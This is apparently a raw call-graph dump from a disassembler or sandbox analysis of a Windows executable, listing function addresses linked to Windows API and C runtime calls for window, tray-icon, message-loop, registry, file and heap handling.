1b3688 49194->49195 49196 1b36e7 49194->49196 49214 1b36e5 49194->49214 49197 1b375d PostQuitMessage 49195->49197 49198 1b3695 49195->49198 49200 1b36f2 49196->49200 49201 1b3715 SetTimer RegisterWindowMessageW 49196->49201 49221 1b36be 49196->49221 49204 1b36d8 49197->49204 49202 1ed2bf 49198->49202 49203 1b36a0 49198->49203 49199 1b36ca DefWindowProcW 49199->49204 49205 1ed1ef 49200->49205 49206 1b36f9 KillTimer 49200->49206 49201->49204 49207 1b373e CreatePopupMenu 49201->49207 49238 21281f 32 API calls _memset 49202->49238 49208 1b36a8 49203->49208 49209 1b3767 49203->49209 49211 1ed228 MoveWindow 49205->49211 49212 1ed1f4 49205->49212 49225 1b44cb Shell_NotifyIconW _memset 49206->49225 49207->49204 49208->49214 49218 1b374b 49208->49218 49208->49221 49227 1b4531 25 API calls _memset 49209->49227 49211->49204 49217 1ed217 SetFocus 49212->49217 49212->49221 49214->49199 49215 1ed2d1 49215->49199 49215->49204 49217->49204 49226 1b45df 42 API calls _memset 49218->49226 49219 1b375b 49219->49204 49221->49199 49221->49204 49228 1b44cb Shell_NotifyIconW _memset 49221->49228 49223 1ed298 49229 1b43db 49223->49229 49225->49204 49226->49219 49227->49219 49228->49223 49230 1b4406 _memset 49229->49230 49239 1b4213 49230->49239 49232 1b445b 49233 1b44c1 Shell_NotifyIconW 49232->49233 49234 1b44a5 Shell_NotifyIconW 49232->49234 49235 1b44b3 49233->49235 49234->49235 49243 1b410d 49235->49243 49237 1b44ba 49237->49214 49238->49215 49240 1ed568 49239->49240 49241 1b4227 49239->49241 49240->49241 49242 1ed571 DestroyIcon 49240->49242 49241->49232 49242->49241 49244 1b4129 49243->49244 49245 1b4200 49243->49245 49246 1ed50d LoadStringW 49244->49246 49247 1b4144 49244->49247 49245->49237 49249 1b4174 _memset _wcscpy 49246->49249 49248 1b81a7 20 API calls 49247->49248 49247->49249 49248->49249 49250 1b41e6 Shell_NotifyIconW 49249->49250 49250->49245 49251 1b4ad2 49252 1d0f36 19 API calls 49251->49252 49253 1b4ada 49252->49253 49254 1b4aee 49253->49254 49258 1b4a94 49253->49258 49259 1b4a9d 49258->49259 49260 1b4aaf 49258->49260 49261 1d2ec0 __cinit 17 API calls 49259->49261 49262 1b4afe 49260->49262 49261->49260 49263 1b77c7 19 API calls 49262->49263 49264 1b4b16 GetVersionExW 49263->49264 49272 1b4b59 49264->49272 49265 1b4bf1 GetCurrentProcess IsWow64Process 49266 1b4c0a 49265->49266 49268 1b4c89 GetSystemInfo 49266->49268 49269 1b4c20 49266->49269 49267 1edbbd 49270 1b4c56 49268->49270 49281 1b4c95 49269->49281 49270->49254 49272->49265 49272->49267 49274 1b4c7d GetSystemInfo 49277 1b4c47 49274->49277 49275 1b4c32 49276 1b4c95 2 API calls 49275->49276 49278 1b4c3a GetNativeSystemInfo 49276->49278 49277->49270 49279 1b4c4d FreeLibrary 49277->49279 49278->49277 49279->49270 49282 1b4c2e 49281->49282 49283 1b4c9e LoadLibraryA 49281->49283 49282->49274 49282->49275 49283->49282 49284 1b4caf GetProcAddress 49283->49284 49284->49282 49285 1d3307 RtlEncodePointer 49286 1d3547 49285->49286 49287 1d3318 __init_pointers __initp_misc_winsig 49286->49287 49291 1da6a4 EncodePointer 49287->49291 49289 1d3330 __init_pointers 49290 1da019 34 API calls 49289->49290 49291->49289 49292 1f0155 49294 1bade2 49292->49294 49293 1bb6c1 Mailbox 49294->49293 49295 1f000f VariantClear 49294->49295 49296 224570 180 API calls 49294->49296 49297 22e037 23 API calls 49294->49297 49298 21d107 29 API calls 49294->49298 49299 22e04b 23 API calls 49294->49299 49300 1c2123 25 API calls 49294->49300 49295->49294 49296->49294 49297->49294 49298->49294 49299->49294 49300->49294 49301 1b1066 49306 1bf8cf 49301->49306 49303 1b106c 49304 1d2ec0 __cinit 17 API calls 49303->49304 49305 1b1076 49304->49305 49307 1bf8f0 49306->49307 49336 1d0083 49307->49336 49309 1bf8f6 49343 1d02e2 6 API calls 49309->49343 49311 1bf937 49312 1b77c7 19 API calls 49311->49312 49313 1bf941 49312->49313 49314 1b77c7 19 API calls 49313->49314 49315 1bf94b 49314->49315 49316 1b77c7 19 API calls 49315->49316 49317 1bf955 49316->49317 49318 1b77c7 19 API calls 49317->49318 49319 1bf993 49318->49319 49320 1b77c7 19 API calls 49319->49320 49321 1bfa5e 49320->49321 49344 1c60e7 49321->49344 49325 1bfa90 49326 1b77c7 19 API calls 49325->49326 49327 1bfa9a 49326->49327 49328 1bfaf1 GetStdHandle 49327->49328 49329 1bfb3d 49328->49329 49330 1f4904 49328->49330 49331 1bfb45 OleInitialize 49329->49331 49330->49329 49332 1f490d 49330->49332 49331->49303 49366 216be1 24 API calls 49332->49366 49334 1f4914 49335 1f4920 CloseHandle 49334->49335 49335->49331 49367 1d015c 49336->49367 49339 1d015c 19 API calls 49340 1d00c5 49339->49340 49341 1b77c7 19 API calls 49340->49341 49342 1d00d1 49341->49342 49342->49309 49343->49311 49345 1b77c7 19 API calls 49344->49345 49346 1c60f7 49345->49346 49347 1b77c7 19 API calls 49346->49347 49348 1c60ff 49347->49348 49349 1b77c7 19 API calls 49348->49349 49350 1c611a 49349->49350 49351 1d0f36 19 API calls 49350->49351 49352 1bfa68 49351->49352 49353 1c6259 49352->49353 49354 1c6267 49353->49354 49355 1b77c7 19 API calls 49354->49355 49356 1c6272 49355->49356 49357 1b77c7 19 API calls 49356->49357 49358 1c627d 49357->49358 49359 1b77c7 19 API calls 49358->49359 49360 1c6288 49359->49360 49361 1b77c7 19 API calls 49360->49361 49362 1c6293 49361->49362 49363 1d0f36 19 API calls 49362->49363 49364 1c62a5 RegisterWindowMessageW 49363->49364 49364->49325 49366->49334 49368 1b77c7 19 API calls 49367->49368 49369 1d0167 49368->49369 49370 1b77c7 19 API calls 49369->49370 49371 1d016f 49370->49371 49372 1b77c7 19 API calls 49371->49372 49373 1d00bb 49372->49373 49373->49339 49374 1b1055 49379 1b2649 49374->49379 49376 1b105a 49377 1d2ec0 __cinit 17 API calls 49376->49377 49378 1b1064 49377->49378 49380 1b77c7 19 API calls 49379->49380 49381 1b26b7 49380->49381 49384 1b3582 49381->49384 49383 1b2754 49383->49376 49387 1b35b0 49384->49387 49388 1b35a1 49387->49388 49389 1b35bd 49387->49389 49388->49383 49389->49388 49390 1b35c4 RegOpenKeyExW 49389->49390 49390->49388 49391 1b35de RegQueryValueExW 49390->49391 49392 1b35ff 49391->49392 49393 1b3614 RegCloseKey 49391->49393 49392->49393 49393->49388 49394 1d7dd3 49417 1d8a80 49394->49417 49396 1d7ddf ___crtGetShowWindowMode 49397 1d7dee 49396->49397 49418 1d8cfc GetProcessHeap 49397->49418 49399 1d7e3c 49400 1d7e48 49399->49400 49401 1d7e40 _fast_error_exit 49399->49401 49402 1d7e59 __RTC_Initialize 49400->49402 49403 1d7e51 _fast_error_exit 49400->49403 49401->49400 49419 1dd752 49402->49419 49403->49402 49405 1d7e67 49406 1d7e6b _fast_error_exit 49405->49406 49407 1d7e73 GetCommandLineW ___crtGetEnvironmentStringsW 49405->49407 49406->49407 49433 1e4c9b GetModuleFileNameW 49407->49433 49409 1d7e8d 49437 1e4ed8 49409->49437 49411 1d7e9e 49451 1d326f 49411->49451 49413 1d7eb1 49414 1d7ebd __wwincmdln 49413->49414 49458 1b492e 49414->49458 49416 1d7ed0 __setmode 49417->49396 49418->49399 49467 1d8a80 49419->49467 49421 1dd75e __lock 49468 1d8955 49421->49468 49423 1dd7e1 GetStartupInfoW 49429 1dd7f6 49423->49429 49430 1dd925 49423->49430 49425 1dd781 @_EH4_CallFilterFunc@8 __setmode 49425->49405 49426 1d8955 __calloc_crt 3 API calls 49426->49429 49427 1dd972 GetStdHandle 49427->49430 49428 1dd985 GetFileType 49428->49430 49429->49426 49429->49430 49432 1dd844 49429->49432 49430->49425 49430->49427 49430->49428 49431 1dd878 GetFileType 49431->49432 49432->49430 49432->49431 49434 1e4ccf _wparse_cmdline 49433->49434 49436 1e4d0f _wparse_cmdline 49434->49436 49483 1d899d 17 API calls 2 library calls 49434->49483 49436->49409 49438 1e4ef1 __NMSG_WRITE 49437->49438 49442 1e4ee9 49437->49442 49439 1d8955 __calloc_crt 3 API calls 49438->49439 49447 1e4f1a __NMSG_WRITE 49439->49447 49440 1e4f71 49485 1d2ed5 49440->49485 49442->49411 49443 1d8955 __calloc_crt 3 API calls 49443->49447 49444 1e4f96 49446 1d2ed5 _free 3 API calls 49444->49446 49446->49442 49447->49440 49447->49442 49447->49443 49447->49444 49448 1e4fad 49447->49448 49484 1e4787 10 API calls __setmode 49447->49484 49491 1d8f46 IsProcessorFeaturePresent 49448->49491 49456 1d327b __IsNonwritableInCurrentImage 49451->49456 49454 1d32ae 49455 1d2ec0 __cinit 17 API calls 49454->49455 49457 1d32b8 __IsNonwritableInCurrentImage 49455->49457 49513 1da651 49456->49513 49457->49413 49459 1b49e7 49458->49459 49460 1b4948 49458->49460 49459->49416 49461 1b4982 IsThemeActive 49460->49461 49462 1b49a7 49461->49462 49516 1b4a5b SystemParametersInfoW SystemParametersInfoW 49462->49516 49464 1b49ba 49517 1b3b4c 49464->49517 49466 1b49c2 SystemParametersInfoW 49466->49459 49467->49421 49471 1d895c 49468->49471 49470 1d8997 49470->49423 49470->49425 49471->49470 49473 1d897a 49471->49473 49474 1e5376 49471->49474 49473->49470 49473->49471 49481 1da2b2 Sleep 49473->49481 49475 1e5381 49474->49475 49479 1e539c 49474->49479 49476 1e538d 49475->49476 49475->49479 49482 1d8ca8 __getptd_noexit 49476->49482 49478 1e53ac RtlAllocateHeap 49478->49479 49480 1e5392 49478->49480 49479->49478 49479->49480 49480->49471 49481->49473 49482->49480 49483->49436 49484->49447 49486 1d2ede HeapFree 49485->49486 49487 1d2f07 _free 49485->49487 49486->49487 49488 1d2ef3 49486->49488 49487->49442 49497 1d8ca8 __getptd_noexit 49488->49497 49490 1d2ef9 GetLastError 49490->49487 49492 1d8f51 49491->49492 49498 1d8dd9 49492->49498 49496 1d8f6c 49496->49411 49497->49490 49499 1d8df3 _memset 49498->49499 49500 1d8e13 IsDebuggerPresent 49499->49500 49506 1da2d5 SetUnhandledExceptionFilter UnhandledExceptionFilter 49500->49506 49503 1d8ed7 49507 1dc776 49503->49507 49504 1d8efa 49505 1da2c0 GetCurrentProcess TerminateProcess 49504->49505 49505->49496 49506->49503 49508 1dc77e 49507->49508 49509 1dc780 IsProcessorFeaturePresent 49507->49509 49508->49504 49511 1e5a8f ___raise_securityfailure 49509->49511 49512 1e5a8a 49509->49512 49511->49504 49512->49511 49514 1da654 EncodePointer 49513->49514 49514->49514 49515 1d3299 __initterm_e 49514->49515 49515->49454 49515->49457 49516->49464 49518 1b3b59 49517->49518 49519 1b77c7 19 API calls 49518->49519 49520 1b3b63 GetCurrentDirectoryW 49519->49520 49555 1b3778 49520->49555 49522 1b3b8c IsDebuggerPresent 49523 1b3b9a 49522->49523 49524 1ed3dd MessageBoxA 49522->49524 49530 1ed3f7 49523->49530 49551 1b3c73 49523->49551 49589 1b73e5 49523->49589 49524->49530 49525 1b3c7a SetCurrentDirectoryW 49527 1b3c87 49525->49527 49527->49466 49529 1b3bd5 GetFullPathNameW 49531 1b3c10 49529->49531 49532 1ed41d SetCurrentDirectoryW 49530->49532 49601 1c0a8d 49531->49601 49532->49527 49534 1b3c26 49534->49530 49535 1b3c2e 49534->49535 49536 1b3c38 49535->49536 49666 214a08 AllocateAndInitializeSid CheckTokenMembership FreeSid 49535->49666 49609 1b3a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 49536->49609 49539 1ed43a 49539->49536 49543 1ed44b 49539->49543 49540 1b3c3d 49615 1b39e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 49540->49615 49542 1b3c42 49544 1b3c55 49542->49544 49546 1b43db 25 API calls 49542->49546 49545 1b4864 2 API calls 49543->49545 49616 1c0b30 49544->49616 49548 1ed453 49545->49548 49546->49544 49553 1ed46a 49548->49553 49549 1b3c60 49549->49551 49665 1b44cb Shell_NotifyIconW _memset 49549->49665 49551->49525 49552 1ed498 GetForegroundWindow ShellExecuteW 49554 1ed4bf 49552->49554 49553->49552 49554->49551 49556 1b77c7 19 API calls 49555->49556 49557 1b378e 49556->49557 49558 1b4864 2 API calls 49557->49558 49559 1b37c0 49558->49559 49667 1b4f3d 49559->49667 49562 1ed2de 49684 219604 49562->49684 49563 1b37ee 49566 1b81a7 20 API calls 49563->49566 49572 1b3801 49566->49572 49567 1ed2fd 49569 1d2ed5 _free 3 API calls 49567->49569 49570 1ed30a 49569->49570 49571 1b4faa 41 API calls 49570->49571 49576 1ed313 49571->49576 49573 1b8620 27 API calls 49572->49573 49574 1b382c 49573->49574 49575 1b8620 27 API calls 49574->49575 49579 1b3861 49575->49579 49577 1b4864 2 API calls 49576->49577 49578 1ed36f 49577->49578 49581 1b81a7 20 API calls 49578->49581 49580 1b77c7 19 API calls 49579->49580 49583 1b387f 49580->49583 49587 1b390a 49581->49587 49582 1b81a7 20 API calls 49584 1ed3ba 49582->49584 49583->49576 49585 1b38cd 49583->49585 49586 1b81a7 20 API calls 49585->49586 49585->49587 49586->49587 49587->49582 49588 1b3926 49587->49588 49588->49522 49590 1b73f2 49589->49590 49591 1b740b 49590->49591 49592 1eed7b _memset 49590->49592 49593 1b48ae GetFullPathNameW 49591->49593 49595 1eed97 GetOpenFileNameW 49592->49595 49594 1b7414 49593->49594 50298 1d0911 49594->50298 49597 1eede6 49595->49597 49598 1b741d 50302 1b69ca 49598->50302 49602 1c0a9a 49601->49602 50381 1b6ee0 49602->50381 49604 1c0ae5 _wcscat 49604->49534 49605 1c0a9f 49605->49604 50390 1c4047 21 API calls 49605->50390 49607 1c0ab5 49607->49604 49608 1c0ab9 GetFullPathNameW 49607->49608 49608->49604 49610 1ed3cc 49609->49610 49611 1b3ac2 LoadImageW RegisterClassExW 49609->49611 50392 1b48fe LoadImageW EnumResourceNamesW 49610->50392 49612 1b3b46 49611->49612 49612->49540 49614 1ed3d5 49615->49542 49618 1c0b55 49616->49618 49617 1c0e5a 49617->49549 49664 1c0b65 Mailbox 49618->49664 50471 20669f 180 API calls 49618->50471 49619 1c0e44 49619->49617 49621 1c1051 49619->49621 49620 1c0bab PeekMessageW 49620->49664 49622 1c1058 LockWindowUpdate DestroyWindow GetMessageW 49621->49622 49622->49617 49625 1c108a 49622->49625 49624 1f51da Sleep 49624->49664 49626 1f5fb1 TranslateMessage DispatchMessageW GetMessageW 49625->49626 49626->49626 49627 1f5fe1 49626->49627 49627->49617 49628 1f50a9 TranslateAcceleratorW 49630 1c0fa3 PeekMessageW 49628->49630 49628->49664 49629 1c1005 TranslateMessage DispatchMessageW 49629->49630 49630->49664 49631 1c0e73 timeGetTime 49631->49664 49632 1f5b78 WaitForSingleObject 49633 1f5b95 GetExitCodeProcess CloseHandle 49632->49633 49632->49664 49657 1c10f5 49633->49657 49634 1c0fbf Sleep 49655 1c0fd0 49634->49655 49635 1b81a7 20 API calls 49635->49664 49636 1b77c7 19 API calls 49636->49655 49637 1d0f36 19 API calls 49637->49664 49638 1f5e51 Sleep 49638->49655 49640 1d034a timeGetTime 49640->49655 49641 1c10ae timeGetTime 49641->49664 49642 1f5ee8 GetExitCodeProcess 49644 1f5efe WaitForSingleObject 49642->49644 49645 1f5f14 CloseHandle 49642->49645 49644->49645 49644->49664 49645->49655 49646 1f5bcd 49646->49657 49647 1f5f70 Sleep 49647->49664 49648 1f53d1 Sleep 49648->49664 49652 1b8b13 27 API calls 49652->49655 49653 1ba000 153 API calls 49653->49664 49655->49636 49655->49640 49655->49642 49655->49646 49655->49647 49655->49648 49655->49652 49655->49657 49655->49664 50475 212700 21 API calls 49655->50475 49657->49549 49659 1b8620 27 API calls 49659->49664 49660 1b8b13 27 API calls 49660->49664 49661 1f592e VariantClear 49661->49664 49662 1f59c4 VariantClear 49662->49664 49663 1f5772 VariantClear 49663->49664 49664->49619 49664->49620 49664->49624 49664->49628 49664->49629 49664->49630 49664->49631 49664->49632 49664->49634 49664->49635 49664->49637 49664->49638 49664->49641 49664->49653 49664->49655 49664->49657 49664->49659 49664->49660 49664->49661 49664->49662 49664->49663 50393 1be580 49664->50393 50398 1be800 49664->50398 50417 1bf5c0 49664->50417 50426 1bfe40 49664->50426 50472 236081 20 API calls 49664->50472 50473 206363 20 API calls 49664->50473 50474 1b8561 20 API calls 49664->50474 49665->49551 49666->49539 49708 1b4d13 49667->49708 49672 1edc3f 49674 1b4faa 41 API calls 49672->49674 49673 1b4f68 LoadLibraryExW 49718 1b4cc8 49673->49718 49676 1edc46 49674->49676 49678 1b4cc8 3 API calls 49676->49678 49683 1edc4e 49678->49683 49680 1b4f8f 49681 1b4faa 41 API calls 49680->49681 49680->49683 49682 1b37e6 49681->49682 49682->49562 49682->49563 49685 219673 49684->49685 49686 1d588c __crtCompareStringA_stat 16 API calls 49685->49686 49699 1ed2f1 49685->49699 49687 219704 49686->49687 49688 1d588c __crtCompareStringA_stat 16 API calls 49687->49688 49689 21970e 49688->49689 49690 21974a 49689->49690 49691 21975f 49689->49691 49694 1d2ed5 _free 3 API calls 49690->49694 49692 219765 49691->49692 49693 2197c4 49691->49693 49888 218baf 49692->49888 49696 1d2ed5 _free 3 API calls 49693->49696 49697 219750 49694->49697 49696->49699 49700 1d2ed5 _free 3 API calls 49697->49700 49699->49567 49702 1b4faa 49699->49702 49700->49699 49701 1d2ed5 _free 3 API calls 49701->49699 49703 1b4fb4 49702->49703 49705 1b4fbb 49702->49705 49704 1d5516 40 API calls 49703->49704 49704->49705 49706 1b4fdb FreeLibrary 49705->49706 49707 1b4fca 49705->49707 49706->49707 49707->49567 49732 1b4d61 49708->49732 49711 1b4d4a FreeLibrary 49712 1b4d53 49711->49712 49715 1d53cb 49712->49715 49713 1b4d61 2 API calls 49714 1b4d3a 49713->49714 49714->49711 49714->49712 49736 1d53e0 49715->49736 49717 1b4f5c 49717->49672 49717->49673 49878 1b4d94 49718->49878 49721 1b4d94 2 API calls 49724 1b4ced 49721->49724 49722 1b4d08 49725 1b4dd0 49722->49725 49723 1b4cff FreeLibrary 49723->49722 49724->49722 49724->49723 49726 1d0f36 19 API calls 49725->49726 49727 1b4de5 49726->49727 49727->49727 49728 1b4e0f _memmove 49727->49728 49729 1b4ee1 49728->49729 49731 1b4e2c 49728->49731 49729->49731 49882 1b4fe9 CreateStreamOnHGlobal 49729->49882 49731->49680 49733 1b4d2e 49732->49733 49734 1b4d6a LoadLibraryA 49732->49734 49733->49713 49733->49714 49734->49733 49735 1b4d7b GetProcAddress 49734->49735 49735->49733 49739 1d53ec __setmode 49736->49739 49737 1d53ff 49778 1d8ca8 __getptd_noexit 49737->49778 49739->49737 49741 1d5430 49739->49741 49740 1d5404 49779 1d8f36 9 API calls __setmode 49740->49779 49753 1e0668 49741->49753 49744 1d5435 49745 1d543e 49744->49745 49746 1d544b 49744->49746 49780 1d8ca8 __getptd_noexit 49745->49780 49748 1d5475 49746->49748 49749 1d5455 49746->49749 49765 1e0787 49748->49765 49781 1d8ca8 __getptd_noexit 49749->49781 49752 1d540f @_EH4_CallFilterFunc@8 __setmode 49752->49717 49782 1d8a80 49753->49782 49755 1e0674 __lock 49756 1e0688 49755->49756 49757 1e06fd 49756->49757 49759 1e06f6 __setmode __getstream 49756->49759 49761 1e06ba __mtinitlocknum 49756->49761 49783 1d6dcd __lock EnterCriticalSection 49756->49783 49784 1d6e37 LeaveCriticalSection 49756->49784 49785 1d899d 17 API calls 2 library calls 49757->49785 49759->49744 49760 1e0704 49760->49759 49763 1e072a EnterCriticalSection 49760->49763 49761->49756 49761->49759 49763->49759 49766 1e07a7 49765->49766 49767 1e07c1 49766->49767 49771 1e097c 49766->49771 49775 1e0968 __wcsnicmp 49766->49775 49789 1d8ca8 __getptd_noexit 49767->49789 49769 1e07c6 49790 1d8f36 9 API calls __setmode 49769->49790 49771->49767 49773 1e09df 49771->49773 49772 1e07d1 49772->49752 49786 1e8721 49773->49786 49775->49771 49776 1e0987 __wcsnicmp 49775->49776 49776->49771 49777 1e09a6 __wcsnicmp 49776->49777 49777->49767 49777->49771 49778->49740 49779->49752 49780->49752 49781->49752 49782->49755 49783->49756 49784->49756 49785->49760 49791 1e7f05 49786->49791 49788 1e873a 49788->49772 49789->49769 49790->49772 49794 1e7f11 __setmode 49791->49794 49792 1e7f27 49876 1d8ca8 __getptd_noexit 49792->49876 49794->49792 49796 1e7f5d 49794->49796 49795 1e7f2c 49877 1d8f36 9 API calls __setmode 49795->49877 49800 1e7fce 49796->49800 49799 1e7f36 __setmode 49799->49788 49801 1e7fee 49800->49801 49802 1d465a __wsopen_nolock 10 API calls 49801->49802 49805 1e800a 49802->49805 49803 1d8f46 __invoke_watson 8 API calls 49804 1e8720 49803->49804 49807 1e7f05 __wsopen_helper 61 API calls 49804->49807 49806 1e8044 49805->49806 49814 1e8067 49805->49814 49875 1e8141 49805->49875 49808 1d8c74 __wsopen_nolock __getptd_noexit 49806->49808 49809 1e873a 49807->49809 49810 1e8049 49808->49810 49809->49799 49811 1d8ca8 __setmode __getptd_noexit 49810->49811 49812 1e8056 49811->49812 49815 1d8f36 __setmode 9 API calls 49812->49815 49813 1e8125 49816 1d8c74 __wsopen_nolock __getptd_noexit 49813->49816 49814->49813 49821 1e8103 __alloc_osfhnd 49814->49821 49817 1e8060 49815->49817 49818 1e812a 49816->49818 49817->49799 49819 1d8ca8 __setmode __getptd_noexit 49818->49819 49820 1e8137 49819->49820 49822 1d8f36 __setmode 9 API calls 49820->49822 49824 1e81fe 49821->49824 49825 1e81db 49821->49825 49822->49875 49827 1e7e7d ___createFile ___crtIsPackagedApp GetModuleHandleW GetProcAddress CreateFileW 49824->49827 49826 1d8c74 __wsopen_nolock __getptd_noexit 49825->49826 49828 1e81e0 49826->49828 49838 1e8220 49827->49838 49829 1d8ca8 __setmode __getptd_noexit 49828->49829 49831 1e81ea 49829->49831 49830 1e829e GetFileType 49832 1e82eb __set_osfhnd 49830->49832 49833 1e82a9 GetLastError 49830->49833 49836 1d8ca8 __setmode __getptd_noexit 49831->49836 49844 1e8355 49832->49844 49866 1e838a 49832->49866 49837 1d8c87 __dosmaperr __getptd_noexit __getptd_noexit 49833->49837 49834 1e826c GetLastError 49835 1d8c87 __dosmaperr __getptd_noexit __getptd_noexit 49834->49835 49840 1e8291 49835->49840 49836->49817 49841 1e82d0 CloseHandle 49837->49841 49838->49830 49838->49834 49842 1e7e7d ___createFile ___crtIsPackagedApp GetModuleHandleW GetProcAddress CreateFileW 49838->49842 49846 1d8ca8 __setmode __getptd_noexit 49840->49846 49841->49840 49845 1e82de 49841->49845 49843 1e8261 49842->49843 49843->49830 49843->49834 49848 1e8366 __lseeki64_nolock 49844->49848 49850 1e84c4 49844->49850 49844->49866 49847 1d8ca8 __setmode __getptd_noexit 49845->49847 49846->49875 49849 1e82e3 49847->49849 49851 1e8385 49848->49851 49848->49866 49849->49840 49852 1e8697 CloseHandle 49850->49852 49850->49875 49853 1d8c74 __wsopen_nolock __getptd_noexit 49851->49853 49854 1e7e7d ___createFile ___crtIsPackagedApp GetModuleHandleW GetProcAddress CreateFileW 49852->49854 49853->49866 49856 1e86be 49854->49856 49855 1e83d1 __lseeki64_nolock 49855->49866 49858 1e86f8 49856->49858 49859 1e86c6 GetLastError 49856->49859 49857 1e83bc __chsize_nolock 49857->49855 49857->49866 49858->49875 49861 1d8c87 __dosmaperr __getptd_noexit __getptd_noexit 49859->49861 49860 1e0c5d __close_nolock 5 API calls 49860->49866 49863 1e86d2 __free_osfhnd 49861->49863 49862 1e0fdb 34 API calls __read_nolock 49862->49866 49863->49858 49864 1e8599 __lseeki64_nolock 49865 1e85aa __lseeki64_nolock 49864->49865 49864->49866 49865->49850 49865->49866 49866->49850 49866->49855 49866->49857 49866->49860 49866->49862 49866->49864 49866->49865 49867 1dda06 __write 31 API calls 49866->49867 49868 1e84c9 __lseeki64_nolock 49866->49868 49870 1e8541 49866->49870 49872 1e8560 __lseeki64_nolock 49866->49872 49867->49866 49868->49866 49869 1e84de __lseeki64_nolock 49868->49869 49869->49866 49871 1e0c5d __close_nolock 5 API calls 49870->49871 49873 1e8548 49871->49873 49872->49850 49872->49866 49874 1d8ca8 __setmode __getptd_noexit 49873->49874 49874->49875 49875->49803 49876->49795 49877->49799 49879 1b4ce1 49878->49879 49880 1b4d9d LoadLibraryA 49878->49880 49879->49721 49879->49724 49880->49879 49881 1b4dae GetProcAddress 49880->49881 49881->49879 49883 1b5003 FindResourceExW 49882->49883 49887 1b5020 49882->49887 49884 1edc8c LoadResource 49883->49884 49883->49887 49885 1edca1 SizeofResource 49884->49885 49884->49887 49886 1edcb5 LockResource 49885->49886 49885->49887 49886->49887 49887->49731 49889 218bc8 49888->49889 49890 218bba 49888->49890 49892 218c0d 49889->49892 49893 1d53cb 87 API calls 49889->49893 49904 218bd1 49889->49904 49891 1d53cb 87 API calls 49890->49891 49891->49889 49919 218e3a 49892->49919 49894 218bf2 49893->49894 49894->49892 49896 218bfb 49894->49896 49901 1d5516 40 API calls 49896->49901 49896->49904 49897 218c51 49898 218c55 49897->49898 49899 218c76 49897->49899 49900 218c62 49898->49900 49903 1d5516 40 API calls 49898->49903 49924 218a52 49899->49924 49900->49904 49906 1d5516 40 API calls 49900->49906 49901->49904 49903->49900 49904->49701 49906->49904 49907 218ca4 49933 218cd4 49907->49933 49908 218c84 49910 218c91 49908->49910 49912 1d5516 40 API calls 49908->49912 49910->49904 49913 1d5516 40 API calls 49910->49913 49912->49910 49913->49904 49917 218cbf 49917->49904 49918 1d5516 40 API calls 49917->49918 49918->49904 49920 218e48 _memmove 49919->49920 49921 218e5f 49919->49921 49922 218e6f 49920->49922 49960 1d5752 49921->49960 49922->49897 49925 1d588c __crtCompareStringA_stat 16 API calls 49924->49925 49926 218a61 49925->49926 49927 1d588c __crtCompareStringA_stat 16 API calls 49926->49927 49928 218a75 49927->49928 49929 1d588c __crtCompareStringA_stat 16 API calls 49928->49929 49930 218a89 49929->49930 49931 218db6 3 API calls 49930->49931 49932 218a9c 49930->49932 49931->49932 49932->49907 49932->49908 49939 218ce9 49933->49939 49934 218da1 50095 218fde 49934->50095 49936 218aae 39 API calls 49936->49939 49939->49934 49939->49936 49940 218cab 49939->49940 50091 218ebb 49939->50091 50099 218b4a 39 API calls 49939->50099 49941 218db6 49940->49941 49942 218dc3 49941->49942 49944 218dc9 49941->49944 49943 1d2ed5 _free 3 API calls 49942->49943 49943->49944 49945 218dda 49944->49945 49946 1d2ed5 _free 3 API calls 49944->49946 49947 218cb2 49945->49947 49948 1d2ed5 _free 3 API calls 49945->49948 49946->49945 49947->49917 49949 1d5516 49947->49949 49948->49947 49950 1d5522 __setmode 49949->49950 49951 1d554e 49950->49951 49952 1d5536 49950->49952 49955 1d6d8e __lock_file 2 API calls 49951->49955 49959 1d5546 __setmode 49951->49959 50149 1d8ca8 __getptd_noexit 49952->50149 49954 1d553b 50150 1d8f36 9 API calls __setmode 49954->50150 49957 1d5560 49955->49957 50133 1d54aa 49957->50133 49959->49917 49963 1d576d 49960->49963 49962 1d5768 49962->49922 49964 1d5779 __setmode 49963->49964 49965 1d57bc 49964->49965 49966 1d578f _memset 49964->49966 49973 1d57b4 __setmode 49964->49973 49974 1d6d8e 49965->49974 49993 1d8ca8 __getptd_noexit 49966->49993 49971 1d57a9 49994 1d8f36 9 API calls __setmode 49971->49994 49973->49962 49975 1d6d9e 49974->49975 49976 1d6dc0 EnterCriticalSection 49974->49976 49975->49976 49977 1d6da6 __lock 49975->49977 49978 1d57c2 49976->49978 49977->49978 49979 1d558d 49978->49979 49982 1d55a8 _memset 49979->49982 49986 1d55c3 49979->49986 49980 1d55b3 50087 1d8ca8 __getptd_noexit 49980->50087 49982->49980 49982->49986 49987 1d5603 49982->49987 49983 1d55b8 50088 1d8f36 9 API calls __setmode 49983->50088 49986->49973 49987->49986 49988 1d5714 _memset 49987->49988 49995 1d4856 49987->49995 50002 1e0fdb 49987->50002 50067 1e0d27 49987->50067 50089 1e0e48 11 API calls 2 library calls 49987->50089 50090 1d8ca8 __getptd_noexit 49988->50090 49993->49971 49994->49973 49996 1d4875 49995->49996 49997 1d4860 49995->49997 49996->49987 49998 1d8ca8 __setmode __getptd_noexit 49997->49998 49999 1d4865 49998->49999 50000 1d8f36 __setmode 9 API calls 49999->50000 50001 1d4870 50000->50001 50001->49987 50003 1e0ffc 50002->50003 50004 1e1013 50002->50004 50005 1d8c74 __wsopen_nolock __getptd_noexit 50003->50005 50006 1e174b 50004->50006 50011 1e104d 50004->50011 50007 1e1001 50005->50007 50008 1d8c74 __wsopen_nolock __getptd_noexit 50006->50008 50009 1d8ca8 __setmode __getptd_noexit 50007->50009 50010 1e1750 50008->50010 50016 1e1008 50009->50016 50012 1d8ca8 __setmode __getptd_noexit 50010->50012 50013 1e1055 50011->50013 50018 1e106c 50011->50018 50014 1e1061 50012->50014 50015 1d8c74 __wsopen_nolock __getptd_noexit 50013->50015 50020 1d8f36 __setmode 9 API calls 50014->50020 50017 1e105a 50015->50017 50016->49987 50023 1d8ca8 __setmode __getptd_noexit 50017->50023 50018->50016 50019 1e1081 50018->50019 50022 1e109b 50018->50022 50024 1e10b9 50018->50024 50021 1d8c74 __wsopen_nolock __getptd_noexit 50019->50021 50020->50016 50021->50017 50022->50019 50026 1e10a6 50022->50026 50023->50014 50025 1d899d __malloc_crt 17 API calls 50024->50025 50027 1e10c9 50025->50027 50031 1e1233 ReadFile 50026->50031 50033 1e11d0 GetConsoleMode 50026->50033 50028 1e10ec __lseeki64_nolock 50027->50028 50029 1e10d1 50027->50029 